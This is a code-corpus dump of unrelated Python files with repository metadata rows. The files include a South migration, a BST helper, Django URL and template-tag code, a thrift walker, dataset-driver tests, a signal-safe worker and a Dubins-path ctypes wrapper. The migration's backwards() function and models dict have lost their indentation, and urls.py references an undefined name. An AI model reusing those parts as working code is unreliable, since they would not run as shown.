    UserSuggestedLeads tables and add the new Profile columns."""
    # Adding model 'UserSkills'
    db.create_table('core_userskills', (
        ('id', models.AutoField(primary_key=True)),
        ('user', models.ForeignKey(orm['auth.User'])),
        ('skill', models.ForeignKey(orm.Skill)),
        ('sort', models.IntegerField()),
        ('created_by', models.ForeignKey(orm['auth.User'], related_name="userskill_created_by")),
        ('created_at', models.DateTimeField(editable=False)),
    ))
    db.send_create_signal('core', ['UserSkills'])
    # Adding model 'Skill'
    db.create_table('core_skill', (
        ('id', models.AutoField(primary_key=True)),
        ('title', models.CharField(max_length=200)),
    ))
    db.send_create_signal('core', ['Skill'])
    # Adding model 'UserSuggestedLeads'
    # NOTE(review): 'oulet' (sic) is the actual column name; renaming it
    # would require a separate migration, so the typo is preserved here.
    db.create_table('core_usersuggestedleads', (
        ('id', models.AutoField(primary_key=True)),
        ('user', models.ForeignKey(orm['auth.User'])),
        ('oulet', models.CharField(max_length=200)),
        ('outlet_uri', models.CharField(max_length=300)),
        ('outlet_phone', models.CharField(max_length=25, blank=True)),
        ('created_by', models.ForeignKey(orm['auth.User'], related_name="usersuggestedleads_created_by")),
        ('created_at', models.DateTimeField(editable=False)),
    ))
    db.send_create_signal('core', ['UserSuggestedLeads'])
    # Adding field 'Profile.facebookid'
    db.add_column('core_profile', 'facebookid', models.CharField(max_length=200))
    # Adding field 'Profile.gender'
    db.add_column('core_profile', 'gender', models.BooleanField(default=True))
    # Adding field 'Profile.blog_uri'
    db.add_column('core_profile', 'blog_uri', models.CharField(max_length=300))
    # Adding field 'Profile.twitterid'
    db.add_column('core_profile', 'twitterid', models.CharField(max_length=200))
    # Adding field 'Profile.bio'
    db.add_column('core_profile', 'bio', models.TextField())
    # Adding field 'Profile.linkedinid'
    db.add_column('core_profile', 'linkedinid', models.CharField(max_length=200))
def backwards(self, orm):
# Deleting model 'UserSkills'
db.delete_table('core_userskills')
# Deleting model 'Skill'
db.delete_table('core_skill')
# Deleting model 'UserSuggestedLeads'
db.delete_table('core_usersuggestedleads')
# Deleting field 'Profile.facebookid'
db.delete_column('core_profile', 'facebookid')
# Deleting field 'Profile.gender'
db.delete_column('core_profile', 'gender')
# Deleting field 'Profile.blog_uri'
db.delete_column('core_profile', 'blog_uri')
# Deleting field 'Profile.twitterid'
db.delete_column('core_profile', 'twitterid')
# Deleting field 'Profile.bio'
db.delete_column('core_profile', 'bio')
# Deleting field 'Profile.linkedinid'
db.delete_column('core_profile', 'linkedinid')
models = {
'core.profile': {
'bio': ('models.TextField', [], {}),
'blog_uri': ('models.CharField', [], {'max_length': '300'}),
'facebookid': ('models.CharField', [], {'max_length': '200'}),
'gender': ('models.BooleanField', [], {'default': 'True'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'linkedinid': ('models.CharField', [], {'max_length': '200'}),
'phone': ('models.CharField', [], {'max_length': '25', 'blank': 'True'}),
'twitterid': ('models.CharField', [], {'max_length': '200'}),
'user': ('models.ForeignKey', ["orm['auth.User']"], {})
},
'core.userskills': {
'created_at': ('models.DateTimeField', [], {'editable': 'False'}),
'created_by': ('models.ForeignKey', ["orm['auth.User']"], {'related_name': '"userskill_created_by"'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'skill': ('models.ForeignKey', ["orm['core.Skill']"], {}),
'sort': ('models.IntegerField', [], {}),
'user': ('models.ForeignKey', ["orm['auth.User']"], {})
},
'core.skill': {
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'title': ('models.CharField', [], {'max_length': '200'})
},
'auth.user': {
'_stub': True,
'id': ('models.AutoField', [], {'primary_key': 'True'})
},
'core.usersuggestedleads': {
'created_at': ('models.DateTimeField', [], {'editable': 'False'}),
'created_by': ('models.ForeignKey', ["orm['auth.User']"], {'related_name': '"usersuggestedleads_created_by"'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'oulet': ('models.CharField', [], {'max_length': '200'}),
'outlet_phone': ('models.CharField', [], {'max_length': '25', 'blank': 'True'}),
'outlet_uri': ('models.CharField', [], {'max_length': '300'}),
'user': ('models.ForeignKey', ["orm['auth.User']"], {})
}
}
complete_apps = ['core']
|
UTF-8
|
Python
| false | false | 2,011 |
8,632,884,268,161 |
191cab5e067307e27b48396989556b84f82c0a0b
|
ee3efcacefe1aa9657bbfbdd6ec269cc110d3c50
|
/AMP/NthSmallestElementInBinarySearchTree.py
|
e16287121349453ee294aeeba0590a4558c406bb
|
[] |
no_license
|
qz267/leet-code-fun
|
https://github.com/qz267/leet-code-fun
|
2ce7dcde9581e75122baac7bb4d64a77faa1f8ab
|
93598fdb543706cba5ecc815d40a1e162766c2a2
|
refs/heads/master
| 2020-04-17T19:54:47.875461 | 2014-07-22T18:33:19 | 2014-07-22T18:33:19 | 11,535,821 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
__author__ = 'zhengqin'
class Solution(object):
    """
    Question: Write a function to find the nth smallest element in a binary search tree
    """

    def nth_smallest(self, root, n):
        """Return the value of the n-th smallest node (1-based) in a BST.

        Nodes are expected to expose ``val``, ``left`` and ``right``
        attributes.  Uses an iterative in-order traversal, which visits a
        BST's nodes in ascending order, stopping as soon as the n-th node
        is reached, so only O(h + n) nodes are touched (h = tree height).

        Returns ``None`` when ``root`` is ``None`` or the tree holds fewer
        than ``n`` nodes.
        """
        stack = []
        node = root
        seen = 0
        while stack or node is not None:
            # Dive to the leftmost unvisited node.
            while node is not None:
                stack.append(node)
                node = node.left
            node = stack.pop()
            seen += 1
            if seen == n:
                return node.val
            # Continue the in-order walk in the right subtree.
            node = node.right
        return None
|
UTF-8
|
Python
| false | false | 2,014 |
11,819,750,022,080 |
dc8dae8c10d936485e4d81eb52c42858a9a2c18b
|
d4f7609a700e45da9b7128ffc306616dfbc7607c
|
/urls.py
|
d1b4955c39f9618c43b015d372a6e8e31afc788b
|
[] |
no_license
|
Skorch/blorgmusic
|
https://github.com/Skorch/blorgmusic
|
e8fd8b58a1f5397d23dcb9e7c37c18b742b79914
|
aab78113f9d218e58cb0dfe6693c0a351566caeb
|
refs/heads/master
| 2016-09-06T02:04:23.499432 | 2011-07-01T16:58:01 | 2011-07-01T16:58:01 | 1,748,830 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django.conf.urls.defaults import *
from BlorgMusicHandler.ajaxhandler import *
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = patterns('',
    # Uncomment the admin/doc line below to enable admin documentation:
    # (r'^admin/doc/', include('django.contrib.admindocs.urls')),

    # Uncomment the next line to enable the admin:
    # (r'^admin/', include(admin.site.urls)),

    # Ingest-pipeline endpoints (string view paths, resolved lazily).
    (r'^updatesongdata/$', 'BlorgMusicIngestPipeline.updatesongdata.main'),
    (r'^admindata/$', 'BlorgMusicIngestPipeline.admindata.main'),
    (r'^parsetwitter/$', 'BlorgMusicIngestPipeline.twitterhandler.main'),
    (r'^fetchdata/$', 'BlorgMusicIngestPipeline.fetchdata.main'),
    (r'^test/songtitle/$', 'BlorgMusicIngestPipeline.test_songtitleparse.main'),

    # RPC endpoint backed by the handler package.
    (r'^rpc/$', 'BlorgMusicHandler.fetchdata.main'),

    # NOTE(review): ``ws`` is not defined anywhere in this module (only the
    # ajaxhandler module is star-imported above), so this include most
    # likely raises NameError at import time -- confirm the intended
    # urlconf module before shipping.
    (r'^ws/', include(ws.urls)),

    # Site root.
    (r'^$', 'blorgmusic1.views.render'),
)
|
UTF-8
|
Python
| false | false | 2,011 |
14,130,442,424,220 |
f1a4106f1d7f743b9fb8bff768570d1834e0286e
|
9d1fc5eca7b84ef8ca4be6a1392c39def34a0b8c
|
/utils/templatetags/utils_tags.py
|
cf2e9f6a1a5d25baf23515f37d17904d3bffb3eb
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
non_permissive
|
rkabir/NewsBlur
|
https://github.com/rkabir/NewsBlur
|
5fa9780a2499629f6fcc00743e3800d75b9c35df
|
c0f9194cce4e7c6d44c7052a4ca303f38c1d2cfa
|
refs/heads/master
| 2021-01-18T06:59:50.104859 | 2011-03-21T17:53:28 | 2011-03-21T17:53:28 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django.contrib.sites.models import Site
from django import template
register = template.Library()
@register.simple_tag
def current_domain():
    """Template tag: the domain of the currently active Django Site."""
    site = Site.objects.get_current()
    return site.domain
|
UTF-8
|
Python
| false | false | 2,011 |
9,122,510,583,305 |
cb2256c243e57eb82e81fdccbab5b77ecd1e283a
|
5c96acb88f66e230416d1d28bbd67542e769c0b6
|
/mapserv/_thrift/introspection.py
|
e5973ecd5860888e721c55a4c4aef6d0013bb6c3
|
[
"ISC"
] |
permissive
|
eklitzke/mapserv
|
https://github.com/eklitzke/mapserv
|
01671005e5feabcc0f167dbb301d37cce229d788
|
b33f41436999a8ebf4f07b3cdfdc5beec5473f67
|
refs/heads/master
| 2020-06-09T07:10:07.952032 | 2009-10-11T21:22:12 | 2009-10-11T21:22:12 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
def is_thrift_obj(obj):
    """Return True when *obj* looks like a thrift-generated structure.

    Generated thrift classes all carry a ``thrift_spec`` attribute, so its
    presence is used as a duck-type check.
    """
    return hasattr(obj, 'thrift_spec')


def walk_thrift(obj):
    """Returns a generator that does a BFS on the thrift structure, yielding
    items it finds. Cyclic structures are OK.

    Only nested thrift structures are yielded (plain fields such as ints or
    strings are skipped), and each distinct nested object is yielded at most
    once.  Raises TypeError when *obj* itself is not a thrift structure.
    """
    if not is_thrift_obj(obj):
        # Bug fix: ``raise TypeError, msg`` is Python-2-only syntax; the
        # call form below is equivalent and valid on both 2 and 3.
        raise TypeError('Object %r was not a thrift structure' % (obj,))
    seen_ids = set()

    def walk_obj(o):
        q = []
        for attr in o.thrift_spec:
            if attr is None:
                # thrift_spec is indexed by field id; gaps are None.
                continue
            thing = getattr(o, attr[2])  # attr[2] is the field name
            if is_thrift_obj(thing) and id(thing) not in seen_ids:
                q.append(thing)
                seen_ids.add(id(thing))  # guards against cycles
                yield thing
        # Breadth-first: recurse only after the whole level was yielded.
        for thing in q:
            for item in walk_obj(thing):
                yield item

    return walk_obj(obj)
|
UTF-8
|
Python
| false | false | 2,009 |
1,279,900,292,645 |
85f68146ce4bd25ca2846e97ed95263140cc7c19
|
4b57d066671404fd84d99e1a438ad315d1f6b875
|
/mi/dataset/driver/ctdpf_ckl/wfp/test/test_driver.py
|
ada7701a7425979917dc464f79038b2b74c9fb6d
|
[] |
no_license
|
kstiemke/marine-integrations
|
https://github.com/kstiemke/marine-integrations
|
52c0c20bbebf9c0a92a5f89ed1f73b0fe2d5924d
|
e1485ecda888a331a1554450a1d16c58941b6391
|
refs/heads/master
| 2021-01-15T09:37:52.305010 | 2014-06-26T18:01:04 | 2014-06-26T18:01:04 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""
@package mi.dataset.driver.ctdpf_ckl.wfp.test.test_driver
@file marine-integrations/mi/dataset/driver/ctdpf_ckl/wfp/driver.py
@author cgoodrich
@brief Test cases for ctdpf_ckl_wfp driver
USAGE:
Make tests verbose and provide stdout
* From the IDK
$ bin/dsa/test_driver
$ bin/dsa/test_driver -i [-t testname]
$ bin/dsa/test_driver -q [-t testname]
"""
__author__ = 'cgoodrich'
__license__ = 'Apache 2.0'
import unittest
from nose.plugins.attrib import attr
from mock import Mock
from pyon.agent.agent import ResourceAgentState
from interface.objects import ResourceAgentErrorEvent
from mi.core.log import get_logger ; log = get_logger()
from mi.idk.exceptions import SampleTimeout
from mi.idk.dataset.unit_test import DataSetTestCase
from mi.idk.dataset.unit_test import DataSetIntegrationTestCase
from mi.idk.dataset.unit_test import DataSetQualificationTestCase
from mi.dataset.dataset_driver import DriverParameter
from mi.dataset.dataset_driver import DataSourceConfigKey, DataSetDriverConfigKeys
from mi.dataset.driver.ctdpf_ckl.wfp.driver import CtdpfCklWfpDataSetDriver
from mi.dataset.parser.ctdpf_ckl_wfp import CtdpfCklWfpParserDataParticle, DataParticleType
from mi.dataset.parser.wfp_c_file_common import StateKey
# Fill in driver details
# Module-level registration: points the DataSetTestCase framework at the
# ctdpf_ckl WFP driver and supplies the agent identity plus the harvester
# startup config (watch /tmp/dsatest for C*.DAT files; FREQUENCY is 1 --
# presumably seconds between polls, confirm against the harvester docs).
DataSetTestCase.initialize(
    driver_module='mi.dataset.driver.ctdpf_ckl.wfp.driver',
    driver_class='CtdpfCklWfpDataSetDriver',
    agent_resource_id = '123xyz',
    agent_name = 'Agent007',
    agent_packet_config = CtdpfCklWfpDataSetDriver.stream_config(),
    startup_config = {
        DataSourceConfigKey.RESOURCE_ID: 'ctdpf_ckl_wfp',
        DataSourceConfigKey.HARVESTER:
        {
            DataSetDriverConfigKeys.DIRECTORY: '/tmp/dsatest',
            DataSetDriverConfigKeys.PATTERN: 'C*.DAT',
            DataSetDriverConfigKeys.FREQUENCY: 1,
        },
        DataSourceConfigKey.PARSER: {}
    }
)
# The integration and qualification tests generated here are suggested tests,
# but may not be enough to fully test your driver. Additional tests should be
# written as needed.
###############################################################################
# INTEGRATION TESTS #
# Device specific integration tests are for #
# testing device specific capabilities #
###############################################################################
@attr('INT', group='mi')
class IntegrationTest(DataSetIntegrationTestCase):
    """Integration tests: exercise the dataset driver directly by dropping
    sample C*.DAT files into the harvester directory and asserting on the
    particles produced (expected values live in *.result.yml fixtures)."""

    def test_get(self):
        """
        Test that we can get data from files. Verify that the driver
        sampling can be started and stopped
        """
        self.clear_sample_data()

        # Start sampling and watch for an exception
        self.driver.start_sampling()

        self.clear_async_data()
        self.create_sample_data('first.DAT', "C0000001.DAT")
        self.assert_data(None, 'first.result.yml', count=4, timeout=10)

        self.clear_async_data()
        self.create_sample_data('second.DAT', "C0000002.DAT")
        self.assert_data(None, 'second.result.yml', count=7, timeout=10)

    def test_stop_resume(self):
        """
        Test the ability to stop and restart the process
        """
        path_1 = self.create_sample_data('first.DAT', "C0000001.DAT")
        path_2 = self.create_sample_data('second.DAT', "C0000002.DAT")

        # Create and store the new driver state: file 1 fully ingested,
        # file 2 parsed up to byte 33.
        state = {
            'C0000001.DAT': self.get_file_state(path_1, True, 33),
            'C0000002.DAT': self.get_file_state(path_2, False, 33)
        }
        # only the position field in the parser state is initialized in
        # get_file_state, need to add the other state fields
        state['C0000001.DAT']['parser_state'][StateKey.RECORDS_READ] = 3
        state['C0000001.DAT']['parser_state'][StateKey.METADATA_SENT] = True
        state['C0000002.DAT']['parser_state'][StateKey.RECORDS_READ] = 3
        state['C0000002.DAT']['parser_state'][StateKey.METADATA_SENT] = True
        self.driver = self._get_driver_object(memento=state)

        # create some data to parse
        self.clear_async_data()
        self.driver.start_sampling()

        # verify data is produced (only the unread tail of file 2)
        self.assert_data(None, 'partial_second.result.yml', count=3, timeout=10)

    def test_stop_start_resume(self):
        """
        Test the ability to stop and restart sampling, ingesting files in the
        correct order
        """
        # create some data to parse
        self.clear_async_data()
        self.driver.start_sampling()

        self.create_sample_data('first.DAT', "C0000001.DAT")
        self.create_sample_data('second.DAT', "C0000002.DAT")
        self.assert_data(None, 'first.result.yml', count=4, timeout=10)
        self.assert_file_ingested("C0000001.DAT")
        self.assert_file_not_ingested("C0000002.DAT")

        self.driver.stop_sampling()
        self.driver.start_sampling()

        self.assert_data(None, 'second.result.yml', count=7, timeout=10)
        self.assert_file_ingested("C0000002.DAT")

    def test_sample_exception_empty(self):
        """
        Test a case that should produce a sample exception and confirm the
        sample exception occurs. In this case an empty file will produce a sample exception.
        """
        self.clear_async_data()
        # Build a filename matching the harvester pattern ('C*.DAT' -> 'CfooDAT'-style).
        config = self._driver_config()['startup_config']['harvester']['pattern']
        filename = config.replace("*", "foo")
        self.create_sample_data(filename)

        # Start sampling and watch for an exception
        self.driver.start_sampling()
        # an event catches the sample exception
        self.assert_event('ResourceAgentErrorEvent')
        self.assert_file_ingested(filename)

    def test_sample_exception_num_samples(self):
        """
        Test a case that should produce a sample exception and confirm the
        sample exception occurs. In this case a file whose declared sample
        count is wrong produces the exception.
        """
        self.clear_async_data()
        self.create_sample_data('bad_num_samples.DAT', 'C0000001.DAT')

        # Start sampling and watch for an exception
        self.driver.start_sampling()
        # an event catches the sample exception
        self.assert_event('ResourceAgentErrorEvent')
        self.assert_file_ingested('C0000001.DAT')

    def test_timestamp_only(self):
        """
        Test a file containing only a timestamp: it should still produce one
        particle and be marked as ingested rather than raising.
        """
        self.clear_async_data()
        self.create_sample_data('ts_only.DAT', 'C0000001.DAT')

        # Start sampling and watch for an exception
        self.driver.start_sampling()
        self.assert_data(None, 'ts_only.result.yml', count=1, timeout=10)
        self.assert_file_ingested('C0000001.DAT')

    def test_error(self):
        """Ingest a real captured file and expect 4 particles (no yml check)."""
        self.create_sample_data('C0000034.DAT')
        self.driver.start_sampling()
        self.assert_data(None, count=4, timeout=10)
###############################################################################
# QUALIFICATION TESTS #
# Device specific qualification tests are for #
# testing device specific capabilities #
###############################################################################
@attr('QUAL', group='mi')
class QualificationTest(DataSetQualificationTestCase):
    """Qualification tests: run the full dataset agent stack and verify the
    particles published through the agent's data subscribers."""

    def assert_all_queue_empty(self):
        """
        Assert the sample queues for both data streams are empty
        """
        self.assert_sample_queue_size(DataParticleType.METADATA, 0)
        self.assert_sample_queue_size(DataParticleType.DATA, 0)

    def test_publish_path(self):
        """
        Setup an agent/driver/harvester/parser and verify that data is
        published out the agent
        """
        self.create_sample_data('first.DAT', 'C0000001.DAT')
        self.assert_initialize()

        # Verify we get one sample
        try:
            result = self.data_subscribers.get_samples(DataParticleType.METADATA, 1)
            log.debug("First RESULT: %s", result)

            result_2 = self.data_subscribers.get_samples(DataParticleType.DATA, 3)
            log.debug("Second RESULT: %s", result_2)

            result.extend(result_2)
            log.debug("Extended RESULT: %s", result)

            # Verify values
            self.assert_data_values(result, 'first.result.yml')
        except Exception as e:
            log.error("Exception trapped: %s", e)
            self.fail("Sample timeout.")

    def test_large_import(self):
        """
        Test importing a large number of samples from the file at once
        """
        self.create_sample_data('C0000038.DAT')
        self.assert_initialize()

        # get results for each of the data particle streams
        result1 = self.get_samples(DataParticleType.METADATA,1,10)
        result2 = self.get_samples(DataParticleType.DATA,270,40)

    def test_stop_start(self):
        """
        Test the agents ability to start data flowing, stop, then restart
        at the correct spot.
        """
        log.info("CONFIG: %s", self._agent_config())
        self.create_sample_data('first.DAT', "C0000001.DAT")
        self.assert_initialize(final_state=ResourceAgentState.COMMAND)

        # Slow down processing to 1 per second to give us time to stop
        self.dataset_agent_client.set_resource({DriverParameter.RECORDS_PER_SECOND: 1})
        self.assert_start_sampling()

        try:
            # Read the first file and verify the data
            result = self.get_samples(DataParticleType.METADATA)
            result2 = self.get_samples(DataParticleType.DATA, 3)
            result.extend(result2)
            log.debug("RESULT: %s", result)

            # Verify values
            self.assert_data_values(result, 'first.result.yml')
            self.assert_all_queue_empty()

            self.create_sample_data('second.DAT', "C0000002.DAT")
            # Now read the first three records (1 metadata, 2 data) of the second file then stop
            result = self.get_samples(DataParticleType.METADATA)
            result2 = self.get_samples(DataParticleType.DATA, 2)
            result.extend(result2)
            log.debug("got result 1 %s", result)

            self.assert_stop_sampling()
            self.assert_all_queue_empty()

            # Restart sampling and ensure we get the last 4 records of the file
            self.assert_start_sampling()
            result3 = self.get_samples(DataParticleType.DATA, 4)
            log.debug("got result 2 %s", result3)
            result.extend(result3)
            self.assert_data_values(result, 'second.result.yml')

            self.assert_all_queue_empty()
        except SampleTimeout as e:
            log.error("Exception trapped: %s", e, exc_info=True)
            self.fail("Sample timeout.")

    def test_shutdown_restart(self):
        """
        Test a full stop of the dataset agent, then restart the agent
        and confirm it restarts at the correct spot.
        """
        log.info("CONFIG: %s", self._agent_config())
        self.create_sample_data('first.DAT', "C0000001.DAT")
        self.assert_initialize(final_state=ResourceAgentState.COMMAND)

        # Slow down processing to 1 per second to give us time to stop
        self.dataset_agent_client.set_resource({DriverParameter.RECORDS_PER_SECOND: 1})
        self.assert_start_sampling()

        try:
            # Read the first file and verify the data
            result = self.get_samples(DataParticleType.METADATA)
            result2 = self.get_samples(DataParticleType.DATA, 3)
            result.extend(result2)
            log.debug("RESULT: %s", result)

            # Verify values
            self.assert_data_values(result, 'first.result.yml')
            self.assert_all_queue_empty()

            self.create_sample_data('second.DAT', "C0000002.DAT")
            # Now read the first three records (1 metadata, 2 data) of the second file then stop
            result = self.get_samples(DataParticleType.METADATA)
            result2 = self.get_samples(DataParticleType.DATA, 2)
            result.extend(result2)
            log.debug("got result 1 %s", result)

            self.assert_stop_sampling()
            self.assert_all_queue_empty()

            # stop the agent
            self.stop_dataset_agent_client()
            # re-start the agent
            self.init_dataset_agent_client()
            #re-initialize
            self.assert_initialize(final_state=ResourceAgentState.COMMAND)

            # Restart sampling and ensure we get the last 4 records of the file
            self.assert_start_sampling()
            result3 = self.get_samples(DataParticleType.DATA, 4)
            log.debug("got result 2 %s", result3)
            result.extend(result3)
            self.assert_data_values(result, 'second.result.yml')

            self.assert_all_queue_empty()
        except SampleTimeout as e:
            log.error("Exception trapped: %s", e, exc_info=True)
            self.fail("Sample timeout.")

    def test_parser_exception(self):
        """
        Test an exception is raised after the driver is started during
        record parsing.
        """
        self.clear_sample_data()
        self.create_sample_data('bad_num_samples.DAT', 'C0000001.DAT')
        self.create_sample_data('first.DAT', 'C0000002.DAT')

        self.assert_initialize()

        self.event_subscribers.clear_events()
        # The good file should still produce its particles...
        result = self.get_samples(DataParticleType.METADATA)
        result1 = self.get_samples(DataParticleType.DATA, 3)
        result.extend(result1)
        self.assert_data_values(result, 'first.result.yml')
        self.assert_all_queue_empty();

        # Verify an event was raised and we are in our retry state
        self.assert_event_received(ResourceAgentErrorEvent, 10)
        self.assert_state_change(ResourceAgentState.STREAMING, 10)
|
UTF-8
|
Python
| false | false | 2,014 |
10,488,310,166,790 |
d02d4b8f213401584de23fb32a402173c6bfb00f
|
8cb8678fbd11966c8fcb5e45c332f8ac892b6226
|
/py/lib/mprocess.py
|
51f49e9f23a7c696852eec4efbaf398fa1c6d3fd
|
[] |
no_license
|
denissmirnov/appserver
|
https://github.com/denissmirnov/appserver
|
a32dd4b66c98c27ba193fc0a7b642939ee998ccc
|
39005f9b9519e1438b9ec51e4305b78b0037182c
|
refs/heads/master
| 2016-08-07T00:07:41.368456 | 2014-06-09T12:56:25 | 2014-06-09T12:56:25 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import signal
import sys
import os
import multiprocessing
import logging
from ctypes import c_bool
class SafeWorker(multiprocessing.Process):
    """Worker process that can defer SIGINT/SIGTERM across critical sections.

    Subclasses wrap non-interruptible work between safeBlockBegin() and
    safeBlockEnd(); a termination request arriving in between is recorded in
    the shared ``closing`` flag and honoured at the next safe point.
    """

    # Inter-process boolean set by safeStop(); checked at safe points.
    closing = None
    i = 0

    def termHandler(self, signum, stack):
        # Signal handler installed by safeBlockEnd(): exit immediately.
        self.stop()

    def safeBlockBegin(self):
        # Enter a critical section: ignore termination signals for now.
        signal.signal(signal.SIGINT, signal.SIG_IGN)
        signal.signal(signal.SIGTERM, signal.SIG_IGN)

    def safeBlockEnd(self):
        # Leave the critical section: honour any stop requested meanwhile,
        # then restore the terminating handlers.
        if self.closing.value:
            self.stop()
        signal.signal(signal.SIGINT, self.termHandler)
        signal.signal(signal.SIGTERM, self.termHandler)

    def checkExit(self):
        # Voluntary cancellation point for long-running loops.
        if self.closing.value:
            self.stop()

    def __init__(self, args=()):
        # ``closing`` lives in shared memory (ctypes bool) so the parent's
        # safeStop() is visible inside the child process.
        self.closing = multiprocessing.Value(c_bool, False)
        # NOTE(review): target=self.run while run() is not overridden here
        # makes Process.run() its own target; presumably subclasses are
        # expected to override run(closing, *args) -- confirm the intended
        # contract before reusing this class.
        super().__init__(target=self.run, args=(self.closing, ) + args)

    def safeStop(self):
        """Request a graceful stop; the worker exits at its next safe point."""
        self.closing.value = True

    def stop(self):
        """Terminate the current worker process immediately."""
        logging.debug('terminating the worker pid:%d' % os.getpid(), )
        sys.exit(0)
|
UTF-8
|
Python
| false | false | 2,014 |
14,937,896,280,931 |
5a77b190747a0855e4ba49f9d55b714094efe65d
|
21f1a163f6dbccd3b91521875a757c3f93cf0c08
|
/tests/dubins.py
|
2daa0665ce65aecf1a1f0031b9dfb35e07909733
|
[] |
no_license
|
RyanDuToit/Dubins-Curves
|
https://github.com/RyanDuToit/Dubins-Curves
|
d00c3995f0ba5cc5b69bbc3cfb6ac5fd3372fe97
|
1a65985c26910fcc551204f8d7773b30b3e35c3c
|
refs/heads/master
| 2021-01-15T23:21:05.874212 | 2011-03-20T08:10:05 | 2011-03-20T08:10:05 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import ctypes
# Handle onto the compiled Dubins-path shared library (built separately;
# path is relative to the test working directory).
_lib = ctypes.CDLL('../libdubinspaths.so')
_inf = float('inf')  # sentinel used for "no solution" segment parameters
class _DubinsPathStruct(ctypes.Structure):
    """ctypes mirror of the C DubinsPath struct: initial configuration
    (x, y, theta), the three segment parameters, and the path-type code."""
    _fields_ = [('qi', ctypes.c_double * 3),
                ('params', ctypes.c_double * 3),
                ('type', ctypes.c_int)]

    def __str__(self):
        return 'q = %s, p = %s, type = %d' % (self.qi[:], self.params[:], self.type)

# A configuration (x, y, theta) as a C double[3].
_Configuration = ctypes.c_double * 3
def _createDubinsFunction(name):
    """Build a Python wrapper for the named solver in the C library.

    The wrapper takes the normalised problem (alpha, beta, d) and returns
    the three segment lengths as a plain list; unsolvable instances come
    back as [inf, inf, inf].
    """
    cfunc = getattr(_lib, name)

    def wrapper(alpha, beta, d):
        out = (ctypes.c_double * 3)(_inf, _inf, _inf)
        cfunc(ctypes.c_double(alpha),
              ctypes.c_double(beta),
              ctypes.c_double(d),
              out)
        return out[:]

    return wrapper
# One wrapper per Dubins word: the two arc-arc-arc words (LRL/RLR) and the
# four arc-straight-arc words (LSL/LSR/RSL/RSR).
LRLpath = _createDubinsFunction( 'dubins_LRL' )
RLRpath = _createDubinsFunction( 'dubins_RLR' )
LSLpath = _createDubinsFunction( 'dubins_LSL' )
LSRpath = _createDubinsFunction( 'dubins_LSR' )
RSLpath = _createDubinsFunction( 'dubins_RSL' )
RSRpath = _createDubinsFunction( 'dubins_RSR' )
def init( q0, q1, r=1. ):
    """Plan the shortest Dubins path from configuration q0 to q1.

    q0 and q1 are (x, y, theta) triples; r is the turning radius.
    Returns the filled-in _DubinsPathStruct.
    """
    q0p = _Configuration(*tuple(q0))
    q1p = _Configuration(*tuple(q1))
    path = _DubinsPathStruct()
    _lib.dubins_init( q0p, q1p, ctypes.c_double(r), ctypes.pointer(path) )
    return path
def initNormalised(alpha, beta, d):
    """Plan a Dubins path for an already-normalised problem.

    alpha and beta are the start/end headings and d the distance, expressed
    in the normalised frame expected by the C library.  Returns the
    filled-in _DubinsPathStruct.
    """
    path = _DubinsPathStruct()
    a = ctypes.c_double(alpha)
    b = ctypes.c_double(beta)
    d = ctypes.c_double(d)
    # Bug fix: the original called the bare name ``pointer`` (NameError at
    # runtime); it must be qualified as ctypes.pointer like everywhere else
    # in this module.
    _lib.dubins_init_normalised(a, b, d, ctypes.pointer(path))
    return path
def pathLength(path):
    """Total length of a previously initialised Dubins path."""
    c_length = _lib.dubins_path_length
    # Without restype ctypes would truncate the double to an int.
    c_length.restype = ctypes.c_double
    return c_length(ctypes.pointer(path))
def pathSample(path, t):
    """Configuration [x, y, theta] at arc-length t along the path."""
    result = _Configuration()
    _lib.dubins_path_sample(ctypes.pointer(path), ctypes.c_double(t), result)
    return result[:]
# Path-type codes, matching the ordering used by the C library's enum.
# Bug fix / compat: ``xrange`` is Python-2-only; ``range`` behaves
# identically here (six small ints) and also works on Python 3.
(LSL, LSR, RSL, RSR, RLR, LRL) = map( ctypes.c_int, range(6) )
|
UTF-8
|
Python
| false | false | 2,011 |
12,738,873,005,029 |
9442d1e77ba710903f1add6b743a759be7849fdc
|
e61d92ed45094e78996fc41fe6fb50b4a982716b
|
/lib/proprietario.py
|
cd5dda49192b8c7ddf7d5fd2904284b506b47e0e
|
[] |
no_license
|
aledecristojesus/Administradora-de-Imoveis
|
https://github.com/aledecristojesus/Administradora-de-Imoveis
|
bb136882661a17bd45c4db4a5535ecf8a015453b
|
e997c1e603f9ea4976c87a2fb0b0ce6bd59d4bf2
|
refs/heads/master
| 2021-03-12T19:20:56.584323 | 2011-07-14T12:39:59 | 2011-07-14T12:39:59 | 1,837,314 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
# encoding: utf-8
class Proprietario(object):
    """Property-owner record: name, CPF (Brazilian taxpayer id), phone
    number and address, stored as plain public attributes."""

    def __init__(self, nome, cpf, telefone, endereco):
        # Bulk-assign every constructor argument as a same-named attribute.
        self.__dict__.update(
            nome=nome, cpf=cpf, telefone=telefone, endereco=endereco)
|
UTF-8
|
Python
| false | false | 2,011 |
3,092,376,477,756 |
764dfaafde57c6904f0b72f7c0234db6efc1b0a8
|
a4a91a4be52c8cbc0cd5e8e111a19ecfc64d8ba9
|
/etc/flash/makebackupconf.py
|
80ef76b1916690f2e6519efeb3eebb4ea871a02e
|
[
"BSD-3-Clause",
"CC-BY-SA-4.0",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-proprietary-license"
] |
non_permissive
|
Queercon/QC11-Badge
|
https://github.com/Queercon/QC11-Badge
|
5f5ae1b6c4be6a30e88af6c49738025a2771cd0c
|
de412ca7cfdb915e80fab1c13c24bc0c9a08b5ad
|
refs/heads/master
